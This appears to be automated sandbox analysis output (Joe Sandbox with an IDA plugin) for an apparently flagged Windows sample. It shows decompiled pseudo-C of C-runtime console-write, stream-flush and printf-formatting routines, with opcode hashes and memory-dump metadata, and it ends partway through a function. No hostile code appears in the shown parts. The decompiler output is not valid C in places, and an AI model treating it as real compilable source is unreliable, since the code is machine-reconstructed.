    • API String ID: 3120068967-269856862
    • Opcode ID: 8222d743e6ef668dfe588930abc4629eb3f054d96e191639ff5fe4b14f8e0cf5
    • Instruction ID: 2267e60ab533a01b323777a049b5ec9a1357bef60c9f4d6556c8174964e2d060
    • Opcode Fuzzy Hash: 8222d743e6ef668dfe588930abc4629eb3f054d96e191639ff5fe4b14f8e0cf5
    • Instruction Fuzzy Hash: 9E41CDB1D15A28DFEF26CF98C889BAEB7B5FB44300F2485E8D048A7240D7349A81CF50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E00B90D50(void* __edx, void _a4) {
    				long _v8;
    				int _v12;
    				signed int _v16;
    				void _v24;
    				signed int _t12;
    				void _t14;
    				void* _t25;
    				void* _t31;
    				void* _t33;
    				void* _t34;
    				signed int _t35;
    
    				_t31 = __edx;
    				_t12 =  *0xd11338; // 0x8bc2db00
    				_v16 = _t12 ^ _t35;
    				if( *0xd1219c == 0) {
    					L12:
    					if( *0xd1219c != 0) {
    						L16:
    						_t14 = _a4;
    					} else {
    						_v12 = WideCharToMultiByte(GetConsoleOutputCP(), 0,  &_a4, 1,  &_v24, 5, 0, 0);
    						if( *0xd12288 == 0xffffffff) {
    							L15:
    							_t14 = 0xffff;
    						} else {
    							_t31 =  *0xd12288; // 0xfffffffe
    							if(WriteConsoleA(_t31,  &_v24, _v12,  &_v8, 0) != 0) {
    								goto L16;
    							} else {
    								goto L15;
    							}
    						}
    					}
    				} else {
    					if( *0xd12288 == 0xfffffffe) {
    						E00B94940();
    					}
    					if( *0xd12288 != 0xffffffff) {
    						_t31 =  *0xd12288; // 0xfffffffe
    						if(WriteConsoleW(_t31,  &_a4, 1,  &_v8, 0) != 0) {
    							 *0xd1219c = 1;
    							goto L12;
    						} else {
    							if( *0xd1219c != 2 || GetLastError() != 0x78) {
    								_t14 = 0xffff;
    							} else {
    								 *0xd1219c = 0;
    								goto L12;
    							}
    						}
    					} else {
    						_t14 = 0xffff;
    					}
    				}
    				return E00B805D0(_t14, _t25, _v16 ^ _t35, _t31, _t33, _t34);
    			}














    0x00b90d50
    0x00b90d58
    0x00b90d5f
    0x00b90d69
    0x00b90dde
    0x00b90de5
    0x00b90e38
    0x00b90e38
    0x00b90de7
    0x00b90e06
    0x00b90e10
    0x00b90e31
    0x00b90e31
    0x00b90e12
    0x00b90e20
    0x00b90e2f
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00b90e2f
    0x00b90e10
    0x00b90d6b
    0x00b90d72
    0x00b90d74
    0x00b90d74
    0x00b90d80
    0x00b90d9a
    0x00b90da9
    0x00b90dd4
    0x00000000
    0x00b90dab
    0x00b90db2
    0x00b90dcb
    0x00b90dbf
    0x00b90dbf
    0x00000000
    0x00b90dd2
    0x00b90db2
    0x00b90d82
    0x00b90d82
    0x00b90d82
    0x00b90d80
    0x00b90e49

    APIs
    • ___initconout.LIBCMTD ref: 00B90D74
      • Part of subcall function 00B94940: CreateFileA.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,?,00B90D79), ref: 00B94959
    • GetConsoleOutputCP.KERNEL32(00000000,?,00000001,00000000,00000005,00000000,00000000), ref: 00B90DF9
    • WideCharToMultiByte.KERNEL32(00000000), ref: 00B90E00
    • WriteConsoleA.KERNEL32(FFFFFFFE,00000000,?,?,00000000), ref: 00B90E27
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: Console$ByteCharCreateFileMultiOutputWideWrite___initconout
    • String ID:
    • API String ID: 3432720595-0
    • Opcode ID: ba60de798d6f3fed4ac5d7d94c0f988b8dfa8b0abb840396c60de07bf72467e5
    • Instruction ID: 201bdf6851f2402a60014c1b670da55a6a24c8087dfd6732c02e30f022399905
    • Opcode Fuzzy Hash: ba60de798d6f3fed4ac5d7d94c0f988b8dfa8b0abb840396c60de07bf72467e5
    • Instruction Fuzzy Hash: CA216F31610309BFDF20EB98DC85BFA37A4EB14720F5086B8E615D66E0DA709985DB61
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 61%
    			E00B97EE3() {
    				signed int _t104;
    				void* _t119;
    				void* _t122;
    				void* _t130;
    				signed int _t179;
    				void* _t193;
    				void* _t194;
    				void* _t195;
    				void* _t197;
    
    				if(( *( *((intOrPtr*)(_t195 - 8)) + 0xc) & 0x00000001) == 0) {
    					L5:
    					 *( *((intOrPtr*)(_t195 - 8)) + 0xc) =  *( *((intOrPtr*)(_t195 - 8)) + 0xc) | 0x00000002;
    					 *( *((intOrPtr*)(_t195 - 8)) + 0xc) =  *( *((intOrPtr*)(_t195 - 8)) + 0xc) & 0xffffffef;
    					 *( *((intOrPtr*)(_t195 - 8)) + 4) = 0;
    					 *(_t195 - 4) = 0;
    					_t136 =  *(_t195 - 4);
    					 *(_t195 - 0xc) =  *(_t195 - 4);
    					if(( *( *((intOrPtr*)(_t195 - 8)) + 0xc) & 0x0000010c) != 0) {
    						L10:
    						if(( *( *((intOrPtr*)(_t195 - 8)) + 0xc) & 0x00000108) == 0) {
    							 *(_t195 - 4) = 2;
    							 *((short*)(_t195 - 0x14)) =  *(_t195 + 8) & 0x0000ffff;
    							 *(_t195 - 0xc) = E00B87870( *(_t195 - 0x10),  *(_t195 - 0x10), _t195 - 0x14,  *(_t195 - 4));
    							L25:
    							if( *(_t195 - 0xc) ==  *(_t195 - 4)) {
    								_t104 =  *(_t195 + 8) & 0x0000ffff;
    							} else {
    								 *( *((intOrPtr*)(_t195 - 8)) + 0xc) =  *( *((intOrPtr*)(_t195 - 8)) + 0xc) | 0x00000020;
    								_t104 = 0xffff;
    							}
    							goto L28;
    						}
    						if( *((intOrPtr*)( *((intOrPtr*)(_t195 - 8)))) -  *((intOrPtr*)( *((intOrPtr*)(_t195 - 8)) + 8)) < 0) {
    							_push(L"(\"inconsistent IOB fields\", stream->_ptr - stream->_base >= 0)");
    							_push(0);
    							_push(0xa0);
    							_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\_flsbuf.c");
    							_push(2);
    							_t119 = L00B7D760();
    							_t197 = _t197 + 0x14;
    							if(_t119 == 1) {
    								asm("int3");
    							}
    						}
    						 *(_t195 - 4) =  *((intOrPtr*)( *((intOrPtr*)(_t195 - 8)))) -  *((intOrPtr*)( *((intOrPtr*)(_t195 - 8)) + 8));
    						 *((intOrPtr*)( *((intOrPtr*)(_t195 - 8)))) =  *((intOrPtr*)( *((intOrPtr*)(_t195 - 8)) + 8)) + 2;
    						 *( *((intOrPtr*)(_t195 - 8)) + 4) =  *((intOrPtr*)( *((intOrPtr*)(_t195 - 8)) + 0x18)) - 2;
    						if( *(_t195 - 4) <= 0) {
    							if( *(_t195 - 0x10) == 0xffffffff ||  *(_t195 - 0x10) == 0xfffffffe) {
    								 *((intOrPtr*)(_t195 - 0x18)) = 0xd11c48;
    							} else {
    								 *((intOrPtr*)(_t195 - 0x18)) = (( *(_t195 - 0x10) & 0x0000001f) << 6) +  *((intOrPtr*)(0xd13040 + ( *(_t195 - 0x10) >> 5) * 4));
    							}
    							_t68 =  *((intOrPtr*)(_t195 - 0x18)) + 4; // 0xa80
    							_t152 =  *_t68 & 0x00000020;
    							if(( *_t68 & 0x00000020) == 0) {
    								goto L23;
    							} else {
    								_t179 =  *(_t195 - 0x10);
    								 *(_t195 - 0x20) = E00B91100(_t152, _t179, _t179, 0, 0, 2);
    								 *(_t195 - 0x1c) = _t179;
    								if(( *(_t195 - 0x20) &  *(_t195 - 0x1c)) != 0xffffffff) {
    									goto L23;
    								}
    								 *( *((intOrPtr*)(_t195 - 8)) + 0xc) =  *( *((intOrPtr*)(_t195 - 8)) + 0xc) | 0x00000020;
    								_t104 = 0xffff;
    								goto L28;
    							}
    						} else {
    							 *(_t195 - 0xc) = E00B87870( *((intOrPtr*)(_t195 - 8)),  *(_t195 - 0x10),  *((intOrPtr*)( *((intOrPtr*)(_t195 - 8)) + 8)),  *(_t195 - 4));
    							L23:
    							 *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t195 - 8)) + 8)))) =  *(_t195 + 8) & 0x0000ffff;
    							goto L25;
    						}
    					}
    					if( *((intOrPtr*)(_t195 - 8)) == E00B7D1A0() + 0x20 ||  *((intOrPtr*)(_t195 - 8)) == E00B7D1A0() + 0x40) {
    						_t136 =  *(_t195 - 0x10);
    						_t122 = E00B90410(_t130,  *(_t195 - 0x10), _t193, _t194,  *(_t195 - 0x10));
    						_t197 = _t197 + 4;
    						if(_t122 != 0) {
    							goto L10;
    						}
    						goto L9;
    					} else {
    						L9:
    						E00B94510(_t136,  *((intOrPtr*)(_t195 - 8)));
    						_t197 = _t197 + 4;
    						goto L10;
    					}
    				} else {
    					 *( *((intOrPtr*)(_t195 - 8)) + 4) = 0;
    					if(( *( *((intOrPtr*)(_t195 - 8)) + 0xc) & 0x00000010) == 0) {
    						 *( *((intOrPtr*)(_t195 - 8)) + 0xc) =  *( *((intOrPtr*)(_t195 - 8)) + 0xc) | 0x00000020;
    						_t104 = 0xffff;
    						L28:
    						return _t104;
    					}
    					 *((intOrPtr*)( *((intOrPtr*)(_t195 - 8)))) =  *((intOrPtr*)( *((intOrPtr*)(_t195 - 8)) + 8));
    					 *( *((intOrPtr*)(_t195 - 8)) + 0xc) =  *( *((intOrPtr*)(_t195 - 8)) + 0xc) & 0xfffffffe;
    					goto L5;
    				}
    			}












    0x00b97f1d
    0x00b97f69
    0x00b97f75
    0x00b97f84
    0x00b97f8a
    0x00b97f91
    0x00b97f98
    0x00b97f9b
    0x00b97fa9
    0x00b97fe1
    0x00b97fed
    0x00b980f5
    0x00b98105
    0x00b9811d
    0x00b98120
    0x00b98126
    0x00b98141
    0x00b98128
    0x00b98134
    0x00b98137
    0x00b98137
    0x00000000
    0x00b98126
    0x00b97ffe
    0x00b98000
    0x00b98005
    0x00b98007
    0x00b9800c
    0x00b98011
    0x00b98013
    0x00b98018
    0x00b9801e
    0x00b98020
    0x00b98020
    0x00b9801e
    0x00b9802c
    0x00b9803b
    0x00b98049
    0x00b98050
    0x00b98072
    0x00b98095
    0x00b9807a
    0x00b98090
    0x00b98090
    0x00b9809f
    0x00b980a3
    0x00b980a6
    0x00000000
    0x00b980a8
    0x00b980ae
    0x00b980ba
    0x00b980bd
    0x00b980c9
    0x00000000
    0x00000000
    0x00b980d7
    0x00b980da
    0x00000000
    0x00b980da
    0x00b98052
    0x00b98069
    0x00b980e1
    0x00b980f0
    0x00000000
    0x00b980f0
    0x00b98050
    0x00b97fb6
    0x00b97fc5
    0x00b97fc9
    0x00b97fce
    0x00b97fd3
    0x00000000
    0x00000000
    0x00000000
    0x00b97fd5
    0x00b97fd5
    0x00b97fd9
    0x00b97fde
    0x00000000
    0x00b97fde
    0x00b97f1f
    0x00b97f22
    0x00b97f32
    0x00b97f5c
    0x00b97f5f
    0x00b98146
    0x00b98149
    0x00b98149
    0x00b97f3d
    0x00b97f4b
    0x00000000
    0x00b97f4b

    APIs
    Strings
    • f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c, xrefs: 00B9800C
    • ("inconsistent IOB fields", stream->_ptr - stream->_base >= 0), xrefs: 00B98000
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: __getbuf__isatty__write
    • String ID: ("inconsistent IOB fields", stream->_ptr - stream->_base >= 0)$f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c
    • API String ID: 2861569966-4070537404
    • Opcode ID: 859f4e9f9a3d13a185a9e4cfb18a18e2366b49a6882b1e59deb5451dc148fb5f
    • Instruction ID: 1c57675fee38c062f0fa1b40d0eb7486aa275c34735b99127f27e6162f4f4ae4
    • Opcode Fuzzy Hash: 859f4e9f9a3d13a185a9e4cfb18a18e2366b49a6882b1e59deb5451dc148fb5f
    • Instruction Fuzzy Hash: FC51C975A14208EFDB14CF94C495A6DFBB1FF89324F14C2E8E4496B355DA31EA81CB40
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 62%
    			E00B90561() {
    				signed int _t102;
    				signed int _t104;
    				signed int _t114;
    				void* _t118;
    				void* _t121;
    				signed int _t126;
    				void* _t129;
    				signed int _t174;
    				void* _t188;
    				void* _t189;
    				void* _t190;
    				void* _t192;
    
    				if(( *( *(_t190 - 8) + 0xc) & 0x00000001) == 0) {
    					L5:
    					 *( *(_t190 - 8) + 0xc) =  *( *(_t190 - 8) + 0xc) | 0x00000002;
    					 *( *(_t190 - 8) + 0xc) =  *( *(_t190 - 8) + 0xc) & 0xffffffef;
    					 *( *(_t190 - 8) + 4) = 0;
    					 *(_t190 - 4) = 0;
    					_t135 =  *(_t190 - 4);
    					 *(_t190 - 0xc) =  *(_t190 - 4);
    					if(( *( *(_t190 - 8) + 0xc) & 0x0000010c) != 0) {
    						L10:
    						if(( *( *(_t190 - 8) + 0xc) & 0x00000108) == 0) {
    							 *(_t190 - 4) = 1;
    							 *(_t190 - 0xc) = E00B87870( *(_t190 - 4),  *(_t190 - 0x10), _t190 + 8,  *(_t190 - 4));
    							L25:
    							if( *(_t190 - 0xc) ==  *(_t190 - 4)) {
    								_t102 =  *(_t190 + 8) & 0x000000ff;
    							} else {
    								_t104 =  *( *(_t190 - 8) + 0xc) | 0x00000020;
    								 *( *(_t190 - 8) + 0xc) = _t104;
    								_t102 = _t104 | 0xffffffff;
    							}
    							goto L28;
    						}
    						if( *( *(_t190 - 8)) -  *((intOrPtr*)( *(_t190 - 8) + 8)) < 0) {
    							_push(L"(\"inconsistent IOB fields\", stream->_ptr - stream->_base >= 0)");
    							_push(0);
    							_push(0xa0);
    							_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\_flsbuf.c");
    							_push(2);
    							_t118 = L00B7D760();
    							_t192 = _t192 + 0x14;
    							if(_t118 == 1) {
    								asm("int3");
    							}
    						}
    						 *(_t190 - 4) =  *( *(_t190 - 8)) -  *((intOrPtr*)( *(_t190 - 8) + 8));
    						 *( *(_t190 - 8)) =  *((intOrPtr*)( *(_t190 - 8) + 8)) + 1;
    						 *( *(_t190 - 8) + 4) =  *((intOrPtr*)( *(_t190 - 8) + 0x18)) - 1;
    						if( *(_t190 - 4) <= 0) {
    							if( *(_t190 - 0x10) == 0xffffffff ||  *(_t190 - 0x10) == 0xfffffffe) {
    								 *((intOrPtr*)(_t190 - 0x14)) = 0xd11c48;
    							} else {
    								 *((intOrPtr*)(_t190 - 0x14)) = (( *(_t190 - 0x10) & 0x0000001f) << 6) +  *((intOrPtr*)(0xd13040 + ( *(_t190 - 0x10) >> 5) * 4));
    							}
    							_t68 =  *((intOrPtr*)(_t190 - 0x14)) + 4; // 0xa80
    							_t149 =  *_t68 & 0x00000020;
    							if(( *_t68 & 0x00000020) == 0) {
    								goto L23;
    							} else {
    								_t174 =  *(_t190 - 0x10);
    								 *(_t190 - 0x1c) = E00B91100(_t149, _t174, _t174, 0, 0, 2);
    								 *(_t190 - 0x18) = _t174;
    								if(( *(_t190 - 0x1c) &  *(_t190 - 0x18)) != 0xffffffff) {
    									goto L23;
    								}
    								_t114 =  *(_t190 - 8);
    								 *(_t114 + 0xc) =  *( *(_t190 - 8) + 0xc) | 0x00000020;
    								_t102 = _t114 | 0xffffffff;
    								goto L28;
    							}
    						} else {
    							 *(_t190 - 0xc) = E00B87870( *(_t190 - 8),  *(_t190 - 0x10),  *((intOrPtr*)( *(_t190 - 8) + 8)),  *(_t190 - 4));
    							L23:
    							 *((char*)( *((intOrPtr*)( *(_t190 - 8) + 8)))) =  *(_t190 + 8);
    							goto L25;
    						}
    					}
    					if( *(_t190 - 8) == E00B7D1A0() + 0x20 ||  *(_t190 - 8) == E00B7D1A0() + 0x40) {
    						_t135 =  *(_t190 - 0x10);
    						_t121 = E00B90410(_t129,  *(_t190 - 0x10), _t188, _t189,  *(_t190 - 0x10));
    						_t192 = _t192 + 4;
    						if(_t121 != 0) {
    							goto L10;
    						}
    						goto L9;
    					} else {
    						L9:
    						E00B94510(_t135,  *(_t190 - 8));
    						_t192 = _t192 + 4;
    						goto L10;
    					}
    				} else {
    					 *( *(_t190 - 8) + 4) = 0;
    					if(( *( *(_t190 - 8) + 0xc) & 0x00000010) == 0) {
    						_t126 =  *(_t190 - 8);
    						 *( *(_t190 - 8) + 0xc) =  *(_t126 + 0xc) | 0x00000020;
    						_t102 = _t126 | 0xffffffff;
    						L28:
    						return _t102;
    					}
    					 *( *(_t190 - 8)) =  *((intOrPtr*)( *(_t190 - 8) + 8));
    					 *( *(_t190 - 8) + 0xc) =  *( *(_t190 - 8) + 0xc) & 0xfffffffe;
    					goto L5;
    				}
    			}















    0x00b90599
    0x00b905e3
    0x00b905ef
    0x00b905fe
    0x00b90604
    0x00b9060b
    0x00b90612
    0x00b90615
    0x00b90623
    0x00b9065b
    0x00b90667
    0x00b90766
    0x00b90781
    0x00b90784
    0x00b9078a
    0x00b907a3
    0x00b9078c
    0x00b90792
    0x00b90798
    0x00b9079b
    0x00b9079b
    0x00000000
    0x00b9078a
    0x00b90678
    0x00b9067a
    0x00b9067f
    0x00b90681
    0x00b90686
    0x00b9068b
    0x00b9068d
    0x00b90692
    0x00b90698
    0x00b9069a
    0x00b9069a
    0x00b90698
    0x00b906a6
    0x00b906b5
    0x00b906c3
    0x00b906ca
    0x00b906ec
    0x00b9070f
    0x00b906f4
    0x00b9070a
    0x00b9070a
    0x00b90719
    0x00b9071d
    0x00b90720
    0x00000000
    0x00b90722
    0x00b90728
    0x00b90734
    0x00b90737
    0x00b90743
    0x00000000
    0x00000000
    0x00b9074e
    0x00b90751
    0x00b90754
    0x00000000
    0x00b90754
    0x00b906cc
    0x00b906e3
    0x00b90759
    0x00b90762
    0x00000000
    0x00b90762
    0x00b906ca
    0x00b90630
    0x00b9063f
    0x00b90643
    0x00b90648
    0x00b9064d
    0x00000000
    0x00000000
    0x00000000
    0x00b9064f
    0x00b9064f
    0x00b90653
    0x00b90658
    0x00000000
    0x00b90658
    0x00b9059b
    0x00b9059e
    0x00b905ae
    0x00b905cc
    0x00b905d8
    0x00b905db
    0x00b907a8
    0x00b907ab
    0x00b907ab
    0x00b905b9
    0x00b905c7
    0x00000000
    0x00b905c7

    APIs
    Strings
    • f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c, xrefs: 00B90686
    • ("inconsistent IOB fields", stream->_ptr - stream->_base >= 0), xrefs: 00B9067A
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: __getbuf__isatty__write
    • String ID: ("inconsistent IOB fields", stream->_ptr - stream->_base >= 0)$f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c
    • API String ID: 2861569966-4070537404
    • Opcode ID: 5aa59805a87d320bf9b9421a6b6bcbf38eb2f4ddac57715c658ce91bb7c1fb91
    • Instruction ID: 6b4c5239b5f07f3a9699a4ad2455028b89526d7b45190f079b9c26e772cc5d2d
    • Opcode Fuzzy Hash: 5aa59805a87d320bf9b9421a6b6bcbf38eb2f4ddac57715c658ce91bb7c1fb91
    • Instruction Fuzzy Hash: 9B51C779A10208AFDB44DF94C491AADBBB1EF88324F15C2D8D4596B395D731EA81CF40
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 70%
    			E00B95704() {
    				signed int _t499;
    				void* _t504;
    				signed int _t506;
    				void* _t526;
    				void* _t528;
    				signed int _t536;
    				void* _t555;
    				void* _t556;
    				signed int _t557;
    				void* _t559;
    
    				L0:
    				while(1) {
    					L0:
    					 *(_t557 - 0x30) = 8;
    					while(1) {
    						L146:
    						 *(__ebp - 0x260) = 7;
    						while(1) {
    							L148:
    							 *(__ebp - 8) = 0x10;
    							 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    							__eflags =  *(__ebp - 0x10) & 0x00000080;
    							if(( *(__ebp - 0x10) & 0x00000080) != 0) {
    								 *(__ebp - 0x14) = 0x30;
    								 *(__ebp - 0x260) =  *(__ebp - 0x260) + 0x51;
    								__eflags =  *(__ebp - 0x260) + 0x51;
    								 *((char*)(__ebp - 0x13)) = __al;
    								 *(__ebp - 0x1c) = 2;
    							}
    							while(1) {
    								L153:
    								 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
    								__eflags =  *(__ebp - 0x10) & 0x00008000;
    								if(( *(__ebp - 0x10) & 0x00008000) == 0) {
    									 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
    									__eflags =  *(__ebp - 0x10) & 0x00001000;
    									if(( *(__ebp - 0x10) & 0x00001000) == 0) {
    										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
    										__eflags =  *(__ebp - 0x10) & 0x00000020;
    										if(( *(__ebp - 0x10) & 0x00000020) == 0) {
    											 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    											__eflags =  *(__ebp - 0x10) & 0x00000040;
    											if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    												__ecx = __ebp + 0x14;
    												__eax = E00B93D50(__ebp + 0x14);
    												__edx = 0;
    												__eflags = 0;
    												 *(__ebp - 0x2b8) = __eax;
    												 *(__ebp - 0x2b4) = 0;
    											} else {
    												__eax = __ebp + 0x14;
    												__eax = E00B93D50(__ebp + 0x14);
    												asm("cdq");
    												 *(__ebp - 0x2b8) = __eax;
    												 *(__ebp - 0x2b4) = __edx;
    											}
    										} else {
    											 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    											__eflags =  *(__ebp - 0x10) & 0x00000040;
    											if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    												__ecx = __ebp + 0x14;
    												E00B93D50(__ebp + 0x14) = __ax & 0x0000ffff;
    												asm("cdq");
    												 *(__ebp - 0x2b8) = __ax & 0x0000ffff;
    												 *(__ebp - 0x2b4) = __edx;
    											} else {
    												__eax = __ebp + 0x14;
    												__eax = E00B93D50(__ebp + 0x14);
    												__ax = __eax;
    												asm("cdq");
    												 *(__ebp - 0x2b8) = __eax;
    												 *(__ebp - 0x2b4) = __edx;
    											}
    										}
    									} else {
    										__eax = __ebp + 0x14;
    										 *(__ebp - 0x2b8) = E00B93D70(__ebp + 0x14);
    										 *(__ebp - 0x2b4) = __edx;
    									}
    								} else {
    									__ecx = __ebp + 0x14;
    									 *(__ebp - 0x2b8) = E00B93D70(__ebp + 0x14);
    									 *(__ebp - 0x2b4) = __edx;
    								}
    								 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    								__eflags =  *(__ebp - 0x10) & 0x00000040;
    								if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    									goto L170;
    								}
    								L166:
    								__eflags =  *(__ebp - 0x2b4);
    								if(__eflags > 0) {
    									goto L170;
    								}
    								L167:
    								if(__eflags < 0) {
    									L169:
    									 *(__ebp - 0x2b8) =  ~( *(__ebp - 0x2b8));
    									__edx =  *(__ebp - 0x2b4);
    									asm("adc edx, 0x0");
    									__edx =  ~( *(__ebp - 0x2b4));
    									 *(__ebp - 0x2c0) =  ~( *(__ebp - 0x2b8));
    									 *(__ebp - 0x2bc) =  ~( *(__ebp - 0x2b4));
    									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    									L171:
    									 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
    									__eflags =  *(__ebp - 0x10) & 0x00008000;
    									if(( *(__ebp - 0x10) & 0x00008000) == 0) {
    										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
    										__eflags =  *(__ebp - 0x10) & 0x00001000;
    										if(( *(__ebp - 0x10) & 0x00001000) == 0) {
    											__edx =  *(__ebp - 0x2c0);
    											__eax =  *(__ebp - 0x2bc);
    											__eax =  *(__ebp - 0x2bc) & 0x00000000;
    											__eflags = __eax;
    											 *(__ebp - 0x2bc) = __eax;
    										}
    									}
    									__eflags =  *(__ebp - 0x30);
    									if( *(__ebp - 0x30) >= 0) {
    										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
    										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
    										__eflags =  *(__ebp - 0x30) - 0x200;
    										if( *(__ebp - 0x30) > 0x200) {
    											 *(__ebp - 0x30) = 0x200;
    										}
    									} else {
    										 *(__ebp - 0x30) = 1;
    									}
    									 *(__ebp - 0x2c0) =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
    									__eflags =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
    									if(( *(__ebp - 0x2c0) |  *(__ebp - 0x2bc)) == 0) {
    										 *(__ebp - 0x1c) = 0;
    									}
    									__eax = __ebp - 0x49;
    									 *(__ebp - 4) = __ebp - 0x49;
    									while(1) {
    										L181:
    										__ecx =  *(__ebp - 0x30);
    										 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
    										 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
    										__eflags =  *(__ebp - 0x30);
    										if( *(__ebp - 0x30) > 0) {
    											goto L183;
    										}
    										L182:
    										 *(__ebp - 0x2c0) =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
    										__eflags =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
    										if(( *(__ebp - 0x2c0) |  *(__ebp - 0x2bc)) == 0) {
    											L186:
    											__ebp - 0x49 = __ebp - 0x49 -  *(__ebp - 4);
    											 *(__ebp - 0x24) = __ebp - 0x49 -  *(__ebp - 4);
    											__ecx =  *(__ebp - 4);
    											__ecx =  *(__ebp - 4) + 1;
    											 *(__ebp - 4) = __ecx;
    											 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000200;
    											__eflags =  *(__ebp - 0x10) & 0x00000200;
    											if(( *(__ebp - 0x10) & 0x00000200) == 0) {
    												while(1) {
    													L190:
    													__eflags =  *(__ebp - 0x28);
    													if( *(__ebp - 0x28) != 0) {
    														goto L216;
    													}
    													L191:
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    													__eflags =  *(__ebp - 0x10) & 0x00000040;
    													if(( *(__ebp - 0x10) & 0x00000040) != 0) {
    														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000100;
    														__eflags =  *(__ebp - 0x10) & 0x00000100;
    														if(( *(__ebp - 0x10) & 0x00000100) == 0) {
    															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000001;
    															__eflags =  *(__ebp - 0x10) & 0x00000001;
    															if(( *(__ebp - 0x10) & 0x00000001) == 0) {
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000002;
    																__eflags =  *(__ebp - 0x10) & 0x00000002;
    																if(( *(__ebp - 0x10) & 0x00000002) != 0) {
    																	 *(__ebp - 0x14) = 0x20;
    																	 *(__ebp - 0x1c) = 1;
    																}
    															} else {
    																 *(__ebp - 0x14) = 0x2b;
    																 *(__ebp - 0x1c) = 1;
    															}
    														} else {
    															 *(__ebp - 0x14) = 0x2d;
    															 *(__ebp - 0x1c) = 1;
    														}
    													}
    													 *(__ebp - 0x18) =  *(__ebp - 0x18) -  *(__ebp - 0x24);
    													__eax =  *(__ebp - 0x18) -  *(__ebp - 0x24) -  *(__ebp - 0x1c);
    													 *(__ebp - 0x2c4) =  *(__ebp - 0x18) -  *(__ebp - 0x24) -  *(__ebp - 0x1c);
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x0000000c;
    													__eflags =  *(__ebp - 0x10) & 0x0000000c;
    													if(( *(__ebp - 0x10) & 0x0000000c) == 0) {
    														__edx = __ebp - 0x24c;
    														__eax =  *(__ebp + 8);
    														__ecx =  *(__ebp - 0x2c4);
    														__eax = E00B95E80(0x20,  *(__ebp - 0x2c4),  *(__ebp + 8), __ebp - 0x24c);
    													}
    													__edx = __ebp - 0x24c;
    													__eax =  *(__ebp + 8);
    													__ecx =  *(__ebp - 0x1c);
    													__edx = __ebp - 0x14;
    													E00B95EC0( *(__ebp - 0x1c), __ebp - 0x14,  *(__ebp - 0x1c),  *(__ebp + 8), __ebp - 0x24c) =  *(__ebp - 0x10);
    													__eax =  *(__ebp - 0x10) & 0x00000008;
    													__eflags =  *(__ebp - 0x10) & 0x00000008;
